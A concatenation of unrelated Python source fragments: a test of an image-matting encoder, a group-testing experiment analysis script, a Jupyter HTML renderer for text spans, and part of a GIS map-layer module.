model.init_weights()
model.train()
# trimap has 1 channels
img = _demo_inputs((2, 4, 64, 64))
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['img_feat'], (2, 128, 8, 8))
assert_tensor_with_shape(outputs['unknown'], (2, 1, 8, 8))
for i in range(5):
assert_tensor_with_shape(outputs[f'feat{i+1}'], target_shape[i])
model = ResGCAEncoder('BasicBlock', [3, 4, 4, 2], 6)
model.init_weights()
model.train()
# both image and trimap has 3 channels
img = _demo_inputs((2, 6, 64, 64))
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['img_feat'], (2, 128, 8, 8))
assert_tensor_with_shape(outputs['unknown'], (2, 1, 8, 8))
for i in range(5):
assert_tensor_with_shape(outputs[f'feat{i+1}'], target_shape[i])
# test resnet shortcut encoder with late downsample
model = ResGCAEncoder('BasicBlock', [3, 4, 4, 2], 6, late_downsample=True)
model.init_weights()
model.train()
# both image and trimap has 3 channels
img = _demo_inputs((2, 6, 64, 64))
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['img_feat'], (2, 128, 8, 8))
assert_tensor_with_shape(outputs['unknown'], (2, 1, 8, 8))
for i in range(5):
assert_tensor_with_shape(outputs[f'feat{i+1}'], target_late_ds[i])
if torch.cuda.is_available():
# repeat above code again
model = ResGCAEncoder('BasicBlock', [3, 4, 4, 2], 4)
model.init_weights()
model.train()
model.cuda()
# trimap has 1 channels
img = _demo_inputs((2, 4, 64, 64)).cuda()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['img_feat'], (2, 128, 8, 8))
assert_tensor_with_shape(outputs['unknown'], (2, 1, 8, 8))
for i in range(5):
assert_tensor_with_shape(outputs[f'feat{i+1}'], target_shape[i])
model = ResGCAEncoder('BasicBlock', [3, 4, 4, 2], 6)
model.init_weights()
model.train()
model.cuda()
# both image and trimap has 3 channels
img = _demo_inputs((2, 6, 64, 64)).cuda()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['img_feat'], (2, 128, 8, 8))
assert_tensor_with_shape(outputs['unknown'], (2, 1, 8, 8))
for i in range(5):
assert_tensor_with_shape(outputs[f'feat{i+1}'], target_shape[i])
# test resnet shortcut encoder with late downsample
model = ResGCAEncoder(
'BasicBlock', [3, 4, 4, 2], 6, late_downsample=True)
model.init_weights()
model.train()
model.cuda()
# both image and trimap has 3 channels
img = _demo_inputs((2, 6, 64, 64)).cuda()
outputs = model(img)
assert_tensor_with_shape(outputs['out'], (2, 512, 2, 2))
assert_tensor_with_shape(outputs['img_feat'], (2, 128, 8, 8))
assert_tensor_with_shape(outputs['unknown'], (2, 1, 8, 8))
for i in range(5):
assert_tensor_with_shape(outputs[f'feat{i+1}'], target_late_ds[i])
def test_index_blocks():
"""Test index blocks for indexnet encoder."""
# test holistic index block
# test holistic index block without context and nonlinearty
block = HolisticIndexBlock(128, use_context=False, | |
<gh_stars>1-10
import pickle
import numpy as np
from sklearn.metrics import classification_report, confusion_matrix, accuracy_score, roc_auc_score, roc_curve
ROOT_DIR = 'plotout/'
GROUP_TESTING_DATASET_PATH = '/data/weixin/data/GroupTestingDataset'
def load_validate_dump(pkl_name, pkl_dir = './prediction_cache_0.1/', verbose=False, confidence_threshold=0.5):
with open(pkl_dir + pkl_name, "rb") as pkl_file:
evaluate_dict = pickle.load(pkl_file)
target_all = evaluate_dict['target_all']
pred_score_all = evaluate_dict['pred_score_all']
if verbose:
print("Working On:", pkl_name )
pred_label = (pred_score_all>confidence_threshold)
print("confusion_matrix")
print( confusion_matrix(target_all, pred_label))
return pred_score_all, target_all
def main_analysis():
##################################
# Individual Testing Baseline; K=0
##################################
print("##################################")
print("[ Individual Testing K0 Baseline ]")
K0_score, K0_target = load_validate_dump(pkl_name="ResNeXt101FullK0.pkl", verbose=True)
K0_recall = 2 * np.sum( np.logical_and(K0_target, K0_score>0.5) )
K0_FPR = 100 * np.sum( np.logical_and(K0_target==0, K0_score>0.5) ) / np.sum(K0_target==0) # False Positive Rate
print("Recall(%): {} FPR(%): {:3f}".format(K0_recall, K0_FPR))
K0_tests = len(K0_target)
# print("Number of Tests (1st Round): ", K0_tests)
each_K0_GigaMACs = 16.5 # 16.5 GMacs per test
K0_MACs = each_K0_GigaMACs /1000 * K0_tests # TMacs 10^12
print("Number of Tests (1st Round): ", K0_tests)
print("Total Computation: {:.1f} TMACs".format(K0_MACs))
del K0_score, K0_target, each_K0_GigaMACs
##################################
# note that each_K0_GigaMACs and K0_score would be re-used by downstream modules
##################################
##################################
# Algorithm 1 Wrapper Function
##################################
def algorithm_1_wrapper(
pkl_name:str,
exp_title:str,
each_method_GigaMACs:float, # GMacs per test. M images in total.
group_size:int, # M value in the paper
confidence_threshold:float=0.5,
pkl_dir='./prediction_cache_0.1/', # default root dir
):
print("##################################")
print(exp_title)
method_score, method_target = load_validate_dump(pkl_dir=pkl_dir, pkl_name=pkl_name, verbose=True, confidence_threshold=confidence_threshold)
method_tests_Round_1 = len(method_target)
method_TeraMACs_Round_1 = each_method_GigaMACs / 1000 * method_tests_Round_1 # TMacs 10^12
print("Number of Tests (1st Round): ", method_tests_Round_1, "\t Computation: {:.1f} TMACs".format(method_TeraMACs_Round_1))
method_Round_1_next = np.repeat( (method_score>confidence_threshold), group_size) # times group size
print("Number Of Samples After the 1st round:", np.sum(method_Round_1_next))
K0_score, K0_target = load_validate_dump(pkl_dir=pkl_dir, pkl_name="ResNeXt101FullK0.pkl", verbose=False)
method_recall = 100 * np.sum( np.logical_and(
np.logical_and(K0_target, K0_score>0.5),
method_Round_1_next) ) / np.sum(K0_target==1) # use K0 model as the second round
method_FPR = 100 * np.sum( np.logical_and(
np.logical_and(K0_target==0, K0_score>0.5),
method_Round_1_next)
) / np.sum(K0_target==0) # False Positive Rate
print("Recall(%): {} FPR(%): {:3f}".format(method_recall, method_FPR))
method_tests_Round_2 = np.sum(method_Round_1_next)
each_K0_GigaMACs = 16.5 # 16.5 GMacs per test, same as the baseline model
method_TeraMACs_Round_2 = each_K0_GigaMACs / 1000 * method_tests_Round_2 # TMacs 10^12
print("Number of Tests (2nd Round): ", method_tests_Round_2, "\t Computation: {:.1f} TMACs".format(method_TeraMACs_Round_2))
method_TeraMACs_total = method_TeraMACs_Round_1 + method_TeraMACs_Round_2
method_tests_total = method_tests_Round_1 + method_tests_Round_2
print("Total Computation: {:.1f} TeraMACs".format(method_TeraMACs_total), "Total Tests:", method_tests_total, "Relative Cost", method_TeraMACs_total/805.2)
result_dict = {
'method_score': method_score, # raw outputs
'method_target': method_target, # raw outputs
'method_recall': method_recall, # performance metrics
'method_FPR': method_FPR, # performance metrics
'method_tests_Round_1': method_tests_Round_1, # computation cost metrics
'method_tests_Round_2': method_tests_Round_2, # computation cost metrics
'method_TeraMACs_Round_1': method_TeraMACs_Round_1, # computation cost metrics
'method_TeraMACs_Round_2': method_TeraMACs_Round_2, # computation cost metrics
'method_TeraMACs_total': method_TeraMACs_total, # computation cost metrics
}
return result_dict
##################################
# MixupK1 Baseline + only Algorithm 1
##################################
MixupK1_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK1Mixup.pkl',
exp_title='Design 1 Mixup K1 + Algorithm 1 Two-Round',
each_method_GigaMACs=16.5,
group_size=2)
##################################
# MixupK3 Baseline + only Algorithm 1
##################################
MixupK3_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK3Mixup.pkl',
exp_title='Design 1 Mixup K3 + Algorithm 1 Two-Round',
each_method_GigaMACs=16.5,
group_size=4,
)
##################################
# Now We Explore Design 2. And group size 8, 16. And potentially Algorithm 2.
# Start with Design 2 + Algorithm 1 + Group Size + LayerGroup 1/2
##################################
##################################
# Try G2 K=1
##################################
K1G2_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G2K1.pkl',
exp_title='K=1 + Design 2 (G2) + Algorithm 1 Two-Round',
each_method_GigaMACs=20.16,
group_size=2,
)
##################################
# Try G2 K=3
##################################
K3G2_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G2K3.pkl',
exp_title='K=3 + Design 2 (G2) + Algorithm 1 Two-Round',
each_method_GigaMACs=27.46,
group_size=4,
)
##################################
# Try G2 K=7
##################################
K7G2_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G2.pkl',
exp_title='K=7 + Design 2 (G2) + Algorithm 1 Two-Round',
each_method_GigaMACs=42.06,
group_size=8,
)
##################################
# Try G2 K=15
##################################
K15G2_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G2K15.pkl',
exp_title='K=15 + Design 2 (G2) + Algorithm 1 Two-Round',
each_method_GigaMACs=71.27,
group_size=16,
)
##################################
# Try G2 K=31
# Very Expensive. Since there are too many false positives
# need to be with very good confidence threshold
##################################
K31G2_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G2K31.pkl',
exp_title='K=31 + Design 2 (G2) + Algorithm 1 Two-Round',
each_method_GigaMACs=129.68,
group_size=32,
)
##################################
# Now we switch to Group 1
# Try G1 K=1, smaller per forward cost, but less accurate
##################################
K1G1_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK1_imgnet_G1.pkl',
exp_title='K=1 + Design 2 (G1) + Algorithm 1 Two-Round',
each_method_GigaMACs=17.95,
group_size=2,
)
##################################
# Try G2 K=3
##################################
K3G1_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK3_imgnet_G1.pkl',
exp_title='K=3 + Design 2 (G1) + Algorithm 1 Two-Round',
each_method_GigaMACs=20.85,
group_size=4,
)
##################################
# Try G2 K=7
##################################
K7G1_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_imgnet_G1.pkl',
exp_title='K=7 + Design 2 (G1) + Algorithm 1 Two-Round',
each_method_GigaMACs=26.64,
group_size=8,
)
##################################
# Design 3, hierarchical design
##################################
TREE022_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_TREE024_G2_022.pkl',
exp_title='Design 3 (Tree022) + K=3 + Algorithm 1 Two-Round',
each_method_GigaMACs=23.05,
group_size=4,
)
TREE024_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_TREE024_G2.pkl',
exp_title='Design 3 (Tree024) + K=7 + Algorithm 1 Two-Round',
each_method_GigaMACs=33.25,
group_size=8,
)
TREE028_result_dict = algorithm_1_wrapper(
pkl_name='ResNeXt101FullK7_TREE024_G2_028.pkl',
exp_title='Design 3 (Tree028) + K=15 + Algorithm 1 Two-Round',
each_method_GigaMACs=53.65,
group_size=16,
)
##################################
# Algorithm 2 Wrapper Function
##################################
##################################
# Algorithm 2 Wrapper Function: Multi Round Testing
# Itermediate Using: ResNeXt101FullK7_imgnet_G2K1, ResNeXt101FullK7_imgnet_G2K3, K0_target
##################################
def algorithm_2_wrapper(
pkl_name:str,
exp_title:str,
each_method_GigaMACs:float, # GMacs per test. M images in total.
group_size:int, # M value in the paper
confidence_threshold:float=0.5,
pkl_dir='./prediction_cache_0.1/', # default root dir
):
print("##################################")
print(exp_title)
method_score, method_target = load_validate_dump(pkl_name=pkl_name, pkl_dir=pkl_dir, verbose=True, confidence_threshold=confidence_threshold)
method_tests_Round_1 = len(method_target)
method_TeraMACs_Round_1 = each_method_GigaMACs / 1000 * method_tests_Round_1 # TMacs 10^12
print("Number of Tests (1st Round): ", method_tests_Round_1, "\t Computation: {:.1f} TMACs".format(method_TeraMACs_Round_1))
method_Round_1_next = np.repeat( (method_score>confidence_threshold), group_size) # times group size
print("Number Of Samples After the 1st round:", np.sum(method_Round_1_next))
##################################
# Algorithm 2 comes in here
# Insert a Round-2
##################################
if group_size == 8:
# scheme 1: M=8, 4 K1G2 (ResNeXt101FullK7_imgnet_G2K1.pkl) + 2 base (vary with positives in K1G2)
# candidates: ResNeXt101FullK7_imgnet_G2.pkl, ResNeXt101FullK7_TREE042_G2.pkl, ResNeXt101FullK7_TREE024_G2.pkl
# 2nd-level: use K1G2
each_2nd_GigaMACs = 20.16 - 7.3 # could minus the base feature extraciton
group_size_2nd = 2
method_2nd_level_score, _ = load_validate_dump(pkl_dir=pkl_dir, pkl_name='ResNeXt101FullK7_imgnet_G2K1.pkl', verbose=False, confidence_threshold=0.5)
elif group_size == 16:
# scheme 2: M=16, 4 K3G2 (ResNeXt101FullK7_imgnet_G2K3.pkl) + 4 base (vary with positives in K1G2)
# candidates: ResNeXt101FullK7_imgnet_G2K15.pkl, ResNeXt101FullK7_TREE024_G2_028.pkl
# 2nd-level: use K3G2
each_2nd_GigaMACs = 27.46 - 14.6 # could minus the base feature extraciton
group_size_2nd = 4
method_2nd_level_score, _ = load_validate_dump(pkl_dir=pkl_dir, pkl_name='ResNeXt101FullK7_imgnet_G2K3.pkl', verbose=False, confidence_threshold=0.5)
else:
raise NotImplementedError()
method_2nd_level_score_repeat = np.repeat(method_2nd_level_score, group_size_2nd)
method_Round_2_next = np.logical_and(method_Round_1_next, method_2nd_level_score_repeat>0.5)
method_tests_Round_2 = np.sum(method_Round_1_next) // group_size_2nd # div group size second level
method_TeraMACs_Round_2 = each_2nd_GigaMACs / 1000 * method_tests_Round_2 # TMacs 10^12
print("Number of Tests (2nd Round): ", method_tests_Round_2, "\t Computation: {:.1f} TMACs".format(method_TeraMACs_Round_2))
##################################
# Finish Round-2. Comes Round-3.
##################################
K0_score, K0_target = load_validate_dump(pkl_dir=pkl_dir, pkl_name="ResNeXt101FullK0.pkl", verbose=False)
method_recall = 100 * np.sum( np.logical_and(
np.logical_and(K0_target, K0_score>0.5),
method_Round_2_next) ) / np.sum(K0_target==1) # use K0 model as the second round
method_FPR = 100 * np.sum( np.logical_and(
np.logical_and(K0_target==0, K0_score>0.5),
method_Round_2_next)
) / np.sum(K0_target==0) # False Positive Rate
print("Recall(%): {} FPR(%): {:3f}".format(method_recall, method_FPR))
method_tests_Round_3 = np.sum(method_Round_2_next)
each_K0_GigaMACs = 16.5 # 16.5 GMacs per test, same as the baseline model
method_TeraMACs_Round_3 = each_K0_GigaMACs / 1000 * method_tests_Round_3 # TMacs 10^12
print("Number of Tests (3rd Round): ", method_tests_Round_3, "\t Computation: {:.1f} TMACs".format(method_TeraMACs_Round_3))
method_TeraMACs_total = method_TeraMACs_Round_1 + method_TeraMACs_Round_2 + method_TeraMACs_Round_3
method_tests_total = method_tests_Round_1 + method_tests_Round_2 + method_tests_Round_3
print("Total Computation: {:.1f} TeraMACs".format(method_TeraMACs_total), "Total Tests:", method_tests_total, "Relative Cost", method_TeraMACs_total/805.2)
result_dict = {
'method_score': method_score, # raw outputs
'method_target': method_target, # raw outputs
'method_recall': method_recall, # performance metrics
'method_FPR': method_FPR, # performance metrics
'method_tests_Round_1': method_tests_Round_1, # computation cost metrics
'method_tests_Round_3': method_tests_Round_3, # computation cost metrics
'method_TeraMACs_Round_1': method_TeraMACs_Round_1, # computation cost metrics
'method_TeraMACs_Round_3': method_TeraMACs_Round_3, # computation cost metrics
'method_TeraMACs_total': method_TeraMACs_total, # computation cost metrics
}
return result_dict
K7G2_A2_result_dict = algorithm_2_wrapper(
| |
#
# Copyright (c) 2021 IBM Corp.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# span.py
#
# Part of text_extensions_for_pandas
#
# Support for span-centric Jupyter rendering and utilities
#
import textwrap
from typing import *
from enum import Enum
import text_extensions_for_pandas.resources
# TODO: This try/except block is for Python 3.6 support, and should be
# reduced to just importing importlib.resources when 3.6 support is dropped.
try:
import importlib.resources as pkg_resources
except ImportError:
import importlib_resources as pkg_resources
# Limits the max number of displayed documents. Matches Pandas' default display.max_seq_items.
_DOCUMENT_DISPLAY_LIMIT = 100
class SetType(Enum):
NESTED=1
OVERLAP=2
class RegionType(Enum):
NESTED=1
COMPLEX=2
SOLO=3
def pretty_print_html(column: Union["SpanArray", "TokenSpanArray"],
show_offsets: bool) -> str:
"""
HTML pretty-printing of a series of spans for Jupyter notebooks.
Args:
column: Span column (either character or token spans).
show_offsets: True to generate a table of span offsets in addition
to the marked-up text
"""
# Local import to prevent circular dependencies
from text_extensions_for_pandas.array.span import SpanArray
from text_extensions_for_pandas.array.token_span import TokenSpanArray
if not isinstance(column, (SpanArray, TokenSpanArray)):
raise TypeError(f"Expected SpanArray or TokenSpanArray, but received "
f"{column} of type {type(column)}")
# Gets the main script and stylesheet from the 'resources' sub-package
style_text: str = pkg_resources.read_text(text_extensions_for_pandas.resources, "span_array.css")
script_text: str = pkg_resources.read_text(text_extensions_for_pandas.resources, "span_array.js")
# Declare initial variables common to all render calls
instance_init_script_list: List[str] = []
# For each document, pass the array of spans and document text into the script's render function
document_columns = column.split_by_document()
for column_index in range(min(_DOCUMENT_DISPLAY_LIMIT, len(document_columns))):
# Get a javascript representation of the column
span_array = []
token_span_array = []
for e in document_columns[column_index]:
span_array.append(f"""[{e.begin},{e.end}]""")
if hasattr(e, "tokens"):
token_span_array.append(f"""[{e.begin_token},{e.end_token}]""")
document_object_script = f"""
const doc_spans = [{','.join(span_array)}]
const doc_text = '{_get_escaped_doctext(document_columns[column_index])}'
"""
# If the documents are a TokenSpanArray, include the start and end token indices in the document object.
if len(token_span_array) > 0:
document_object_script += f"""
const doc_token_spans = [{','.join(token_span_array)}]
documents.push({{doc_text: doc_text, doc_spans: doc_spans, doc_token_spans: doc_token_spans}})
"""
else:
document_object_script += """
documents.push({doc_text: doc_text, doc_spans: doc_spans})
"""
instance_init_script_list.append(f"""
{{
{document_object_script}
}}
""")
# Defines a list of DOM strings to be appended to the end of the returned HTML.
postfix_tags: List[str] = []
if len(document_columns) > _DOCUMENT_DISPLAY_LIMIT:
postfix_tags.append(f"""
<footer>Documents truncated. Showing {_DOCUMENT_DISPLAY_LIMIT} of {len(document_columns)}</footer>
""")
# Get the show_offsets parameter as a JavaScript boolean
show_offset_string = 'true' if show_offsets else 'false'
return textwrap.dedent(f"""
<style class="span-array-css">
{textwrap.indent(style_text, ' ')}
</style>
<script>
{{
{textwrap.indent(script_text, ' ')}
}}
</script>
<div class="span-array">
{_get_initial_static_html(column, show_offsets)}
<span style="font-size: 0.8em;color: #b3b3b3;">Your notebook viewer does not support Javascript execution. The above rendering will not be interactive.</span>
</div>
<script>
{{
const Span = window.SpanArray.Span
const script_context = document.currentScript
const documents = []
{''.join(instance_init_script_list)}
const instance = new window.SpanArray.SpanArray(documents, {show_offset_string}, script_context)
instance.render()
}}
</script>
{''.join(postfix_tags)}
""")
def _get_escaped_doctext(column: Union["SpanArray", "TokenSpanArray"]) -> List[str]:
# Subroutine of pretty_print_html() above.
# Should only be called for single-document span arrays.
if not column.is_single_document:
raise ValueError("Array contains spans from multiple documents. Can only "
"render one document at a time.")
text = column.document_text
text_pieces = []
for i in range(len(text)):
if text[i] == "'":
text_pieces.append("\\'")
elif text[i] == "\n":
text_pieces.append("\\n")
else:
text_pieces.append(text[i])
return "".join(text_pieces)
def _get_initial_static_html(column: Union["SpanArray", "TokenSpanArray"],
show_offsets: bool) -> str:
# Subroutine of pretty_print_html above.
# Gets the initial static html representation of the column for notebook viewers without JavaScript support.
# Iterates over each document and constructs the DOM string with template literals.
# ! Text inserted into the DOM as raw HTML should always be sanitized to prevent unintended DOM manipulation
# and XSS attacks.
documents = column.split_by_document()
documents_html = []
for column_index in range(min(_DOCUMENT_DISPLAY_LIMIT, len(documents))):
document = documents[column_index]
# Generate a dictionary to store span information, including relationships with spans occupying the same region.
spans = {}
is_token_document = False
sorted_span_ids = []
for i in range(len(document)):
span_data = {}
span_data["id"] = i
span_data["begin"] = document[i].begin
span_data["end"] = document[i].end
if hasattr(document[i], "tokens"):
is_token_document = True
span_data["begin_token"] = document[i].begin_token
span_data["end_token"] = document[i].end_token
span_data["sets"] = []
spans[i] = span_data
sorted_span_ids.append(i)
# Sort IDs
sorted_span_ids.sort(key=lambda id: (spans[id]["begin"], -spans[id]["end"]))
for i in range(len(sorted_span_ids)):
span_data = spans[sorted_span_ids[i]]
for j in range(i+1, len(sorted_span_ids)):
sub_span_data = spans[sorted_span_ids[j]]
# If the spans do not overlap, exit the sub-loop
if(sub_span_data["begin"] >= span_data["end"]):
break
else:
if(sub_span_data["end"] <= span_data["end"]):
span_data["sets"].append({"type": SetType.NESTED, "id": sub_span_data["id"]})
else:
span_data["sets"].append({"type": SetType.OVERLAP, "id": sub_span_data["id"]})
spans[sorted_span_ids[i]] = span_data
# Generate the table rows DOM string from span data.
table_rows_html = []
for i in range(len(spans)):
span = spans[i]
table_rows_html.append(f"""
<tr>
<td><b>{span["id"]}</b></td>
<td>{span["begin"]}</td>
<td>{span["end"]}</td>
""")
if is_token_document:
table_rows_html.append(f"""
<td>{span["begin_token"]}</td>
<td>{span["end_token"]}</td>
""")
table_rows_html.append(f"""
<td>{_get_sanitized_text(document.document_text[span["begin"]:span["end"]])}</td>
</tr>
""")
# Generate the regions of the document_text to highlight from span data.
mark_regions = []
i = 0
while i < len(document):
region = {}
region["root_id"] = i
region["begin"] = spans[i]["begin"]
set_span = _get_set_span(spans, i)
region["end"] = set_span["end"]
if len(spans[i]["sets"]) > 0:
# get set span and type
if(_is_complex(spans, i)):
region["type"] = RegionType.COMPLEX
else:
region["type"] = RegionType.NESTED
else:
region["type"] = RegionType.SOLO
mark_regions.append(region)
i = set_span["highest_id"] + 1
# Generate the document_text DOM string from the regions created above.
context_html = []
if len(mark_regions) == 0:
# There are no marked regions. Just append the sanitized text as a raw string.
context_html.append(_get_sanitized_text(document.document_text))
else:
# Iterate over each marked region and contruct the HTML for preceding text and marked text.
# Then, append that HTML to the list of DOM strings for the document_text.
snippet_begin = 0
for region in mark_regions:
context_html.append(f"""
{_get_sanitized_text(document.document_text[snippet_begin:region["begin"]])}
""")
if region["type"] == RegionType.COMPLEX:
context_html.append(f"""
<span class='mark btn-info complex-set' style='
padding:0.4em;
border-radius:0.35em;
background:linear-gradient(to right, #a0c4ff, #ffadad);
color: black;
'>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}
<span class='mark-tag' style='
font-weight: bolder;
font-size: 0.8em;
font-variant: small-caps;
font-variant-caps: small-caps;
font-variant-caps: all-small-caps;
margin-left: 8px;
text-transform: uppercase;
color: black;
'>Set</span>
</span>
""")
elif region["type"] == RegionType.NESTED:
mark_html = []
nested_snippet_begin = region["begin"]
# Iterate over each span nested within the root span of the marked region
for nested_span in map( \
lambda set: spans[set["id"]],
spans[region["root_id"]]["sets"]):
mark_html.append(f"""
{_get_sanitized_text(document.document_text[nested_snippet_begin:nested_span["begin"]])}
<span class='mark btn-warning' style='
padding:0.2em 0.4em;
border-radius:0.35em;
background-color: #ffadad;
color: black;
'>{_get_sanitized_text(document.document_text[nested_span["begin"]:nested_span["end"]])}</span>
""")
nested_snippet_begin = nested_span["end"]
mark_html.append(_get_sanitized_text(document.document_text[nested_snippet_begin:region["end"]]))
context_html.append(f"""
<span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{"".join(mark_html)}</span>
""")
elif region["type"] == RegionType.SOLO:
context_html.append(f"""
<span class='mark btn-primary' style='padding:0.4em;border-radius:0.35em;background-color: #a0c4ff;color:black;'>{_get_sanitized_text(document.document_text[region["begin"]:region["end"]])}</span>
""")
snippet_begin = region["end"]
context_html.append(_get_sanitized_text(document.document_text[snippet_begin:]))
# Generate the document's DOM string
documents_html.append(f"""
<div class='document'>
<table style='
table-layout: auto;
overflow: hidden;
width: 100%;
border-collapse: collapse;
'>
<thead style='font-variant-caps: all-petite-caps;'>
<th></th>
<th>begin</th>
<th>end</th>
{"<th>begin token</th><th>end token</th>" if is_token_document else ""}
<th style='text-align:right;width:100%'>context</th>
</tr></thead>
<tbody>
{"".join(table_rows_html)}
</tbody>
</table>
<p style='
padding: 1em;
line-height: calc(var(--jp-content-line-height, 1.6) * 1.6);
'>
{"".join(context_html)}
</p>
</div>
""")
# Concat all documents and return the final DOM string
return "".join(documents_html)
def _get_set_span(spans: Dict, id: int) -> Dict:
# Subroutine of _get_initial_static_html() above.
# Recursive algorithm to get the last end and ID values of the set of spans connected to span with the given ID
# Will raise a KeyError exception if an invalid key is given
end = spans[id]["end"]
highest_id = id
# For each span in the set of spans, get the return values and track the greatest endpoint index and ID values.
for set in spans[id]["sets"]:
other = _get_set_span(spans, set["id"])
if other["end"] > end:
end = other["end"]
if other["highest_id"] > highest_id:
highest_id = other["highest_id"]
return {"end": end, "highest_id": highest_id}
def _is_complex(spans: Dict, id: int) -> bool:
# Subroutine of _get_initial_static_html() above.
# Returns True if the provided span should be considered a "Complex" span. Implementation details below.
# Will raise a KeyError exception if an invalid key is given
# If any connection sets are of type:overlap or nested beyond a depth of 1, return True
for set in spans[id]["sets"]:
if set["type"] == SetType.OVERLAP:
return True
elif set["type"] == SetType.NESTED:
if | |
# if layer_id:
# layer_name = db(ftable.id == layer_id).select(ftable.name,
# limitby = (0, 1)
# ).first().name
# else:
# layer_name = "Unknown"
# _debug("Attributes lookup of layer %s completed in %s seconds",
# layer_name,
# duration,
# )
_markers = get_vars.get("markers", None)
if _markers:
# Add a per-feature Marker
marker_fn = s3db.get_config(tablename, "marker_fn")
if marker_fn:
m = {}
for record in resource:
m[record[pkey]] = marker_fn(record)
else:
# No configuration found so use default marker for all
c, f = tablename.split("_", 1)
m = GIS.get_marker(c, f)
markers[tablename] = m
if individual:
# Add a per-feature Style
# Optionally restrict to a specific Config?
#config = GIS.get_config()
stable = s3db.gis_style
query = (stable.deleted == False) & \
(stable.layer_id == layer_id) & \
(stable.record_id.belongs(resource._ids))
#((stable.config_id == config.id) |
# (stable.config_id == None))
rows = db(query).select(stable.record_id,
stable.style)
for row in rows:
styles[row.record_id] = json.dumps(row.style, separators=JSONSEPARATORS)
styles[tablename] = styles
else:
# KML, GeoRSS or GPX
marker_fn = s3db.get_config(tablename, "marker_fn")
if marker_fn:
# Add a per-feature Marker
for record in resource:
markers[record[pkey]] = marker_fn(record)
else:
# No configuration found so use default marker for all
c, f = tablename.split("_", 1)
markers = GIS.get_marker(c, f)
markers[tablename] = markers
# Lookup the LatLons now so that it can be done as a single
# query rather than per record
#if DEBUG:
# start = datetime.datetime.now()
latlons = {}
#wkts = {}
geojsons = {}
gtable = s3db.gis_location
if trackable:
# Use S3Track
ids = resource._ids
# Ensure IDs in ascending order
ids.sort()
try:
tracker = S3Trackable(table, record_ids=ids)
except SyntaxError:
# This table isn't trackable
pass
else:
_latlons = tracker.get_location(_fields=[gtable.lat,
gtable.lon],
empty = False,
)
index = 0
for _id in ids:
_location = _latlons[index]
latlons[_id] = (_location.lat, _location.lon)
index += 1
if not latlons:
join = True
#custom = False
if "location_id" in table.fields:
query = (table.id.belongs(resource._ids)) & \
(table.location_id == gtable.id)
elif "site_id" in table.fields:
stable = s3db.org_site
query = (table.id.belongs(resource._ids)) & \
(table.site_id == stable.site_id) & \
(stable.location_id == gtable.id)
elif tablename == "gis_location":
join = False
query = (table.id.belongs(resource._ids))
else:
# Look at the Context
context = resource.get_config("context")
if context:
location_context = context.get("location")
else:
location_context = None
if not location_context:
# Can't display this resource on the Map
return None
# @ToDo: Proper system rather than this hack_which_works_for_current_usecase
# Resolve selector (which automatically attaches any required component)
rfield = resource.resolve_selector(location_context)
if "." in location_context:
# Component
alias, cfield = location_context.split(".", 1)
try:
component = resource.components[alias]
except KeyError:
# Invalid alias
# Can't display this resource on the Map
return None
ctablename = component.tablename
ctable = s3db[ctablename]
query = (table.id.belongs(resource._ids)) & \
rfield.join[ctablename] & \
(ctable[cfield] == gtable.id)
#custom = True
# @ToDo:
#elif "$" in location_context:
else:
# Can't display this resource on the Map
return None
if geojson and not points:
geojsons[tablename] = GIS.get_locations(table, query, join, geojson)
# @ToDo: Support Polygons in KML, GPX & GeoRSS
#else:
# wkts[tablename] = GIS.get_locations(table, query, join, geojson)
else:
# Points
rows = db(query).select(table.id,
gtable.lat,
gtable.lon)
#if custom:
# # Add geoJSONs
#elif join:
if join:
for row in rows:
# @ToDo: Support records with multiple locations
# (e.g. an Org with multiple Facs)
_location = row["gis_location"]
latlons[row[tablename].id] = (_location.lat, _location.lon)
else:
# gis_location: Always single
for row in rows:
latlons[row.id] = (row.lat, row.lon)
_latlons = {}
if latlons:
_latlons[tablename] = latlons
#if DEBUG:
# end = datetime.datetime.now()
# duration = end - start
# duration = "{:.2f}".format(duration.total_seconds())
# _debug("latlons lookup of layer %s completed in %s seconds",
# layer_name,
# duration,
# )
# Used by S3XML's gis_encode()
return {"geojsons": geojsons,
"latlons": _latlons,
#"wkts": wkts,
"attributes": attributes,
"markers": markers,
"styles": styles,
}
# -------------------------------------------------------------------------
@staticmethod
def get_marker(controller=None,
function=None,
filter=None,
):
"""
Returns a Marker dict
- called by xml.gis_encode() for non-geojson resources
- called by S3Map.widget() if no marker_fn supplied
"""
marker = None
if controller and function:
# Lookup marker in the gis_style table
db = current.db
s3db = current.s3db
ftable = s3db.gis_layer_feature
stable = s3db.gis_style
mtable = s3db.gis_marker
config = GIS.get_config()
query = (ftable.controller == controller) & \
(ftable.function == function) & \
(ftable.aggregate == False)
